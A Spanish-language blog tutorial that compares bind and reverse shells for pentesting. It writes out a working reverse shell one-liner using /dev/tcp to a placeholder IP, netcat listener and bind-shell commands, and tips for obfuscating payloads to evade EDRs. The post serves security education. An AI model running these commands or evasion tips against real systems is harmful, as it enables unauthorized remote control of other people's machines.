purpl3bl0g

🐾 Bienvenid@ al mundo de l1ttl3bugc4t 🐾

Bind vs Reverse Shells: Duelos en la terminal del inframundo 🕳️🐚

June 16, 2025

Cuando te metes en el mundo del pentesting y el hacking ético, hay dos técnicas clásicas que se convierten en tus aliadas para obtener acceso remoto: Bind Shells y Reverse Shells.
Ambas te permiten controlar una máquina comprometida, pero lo hacen de maneras distintas… y estratégicamente geniales 😼⚔️

🧪 ¿Qué es una Shell?

Una shell es una interfaz que te permite interactuar con el sistema operativo a través de comandos.
Una reverse shell o una bind shell simplemente llevan esta interacción a través de una conexión de red 🌐

🔁 Reverse Shell

En una reverse shell, el objetivo (la víctima) se conecta hacia ti, el atacante.

🧠 ¿Cómo funciona?

  1. El atacante levanta un listener (esperando una conexión)
  2. La víctima ejecuta un payload que conecta de regreso al atacante
  3. ¡Boom! Shell remota 🎯
# Atacante
nc -lvnp 4444

# Víctima
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📦 Ventajas

  • Funciona bien con firewalls (salida de red casi siempre permitida)
  • Más sigilosa

🚫 Desventajas

  • El atacante necesita una IP pública o port forwarding
  • Puede ser detectada si el EDR o antivirus monitorea conexiones salientes

🔗 Bind Shell

En una bind shell, el objetivo abre un puerto y escucha conexiones.

🧠 ¿Cómo funciona?

  1. La víctima ejecuta un payload que abre un puerto
  2. El atacante se conecta a ese puerto
# Víctima
nc -lvnp 4444 -e /bin/bash

# Atacante
nc 10.0.0.2 4444

📦 Ventajas

  • El atacante no necesita abrir puertos
  • Más directa en entornos sin NAT

🚫 Desventajas

  • Firewalls pueden bloquear conexiones entrantes
  • Menos sigilosa

🧙‍♀️ ¿Cuál elegir?

Situación Mejor opción
Hay NAT o firewall Reverse Shell ✅
Tienes control sobre el firewall o red Bind Shell ✅
Quieres evitar alertas de IDS Reverse Shell con ofuscación ✅
Objetivo es una red interna con mucho filtrado Depende del contexto… ¡ambas podrían servir con tunelado! 😼

🧰 Herramientas comunes

  • netcat (clásico pero detectable)
  • socat (más flexible y cifrado)
  • msfvenom + Metasploit
  • nishang, powercat, pwncat, revshells.com

🧨 Tips galácticos

  • Ofusca tus payloads para evadir EDRs
  • Usa TLS si puedes (con socat por ejemplo)
  • Recuerda que puedes tunelar con SSH, VPN, o herramientas como chisel
  • ¡Guarda siempre tu IP y puerto en algún lugar mágico! 🪄

✨ Conclusión

Ambas técnicas son esenciales en tu arsenal Red Team.
Conocer cuándo usar una u otra puede marcar la diferencia entre un acceso exitoso… y un logeo frustrado.

“Una shell no te hace hacker… pero te pone en camino.”l1ttl3bugc4t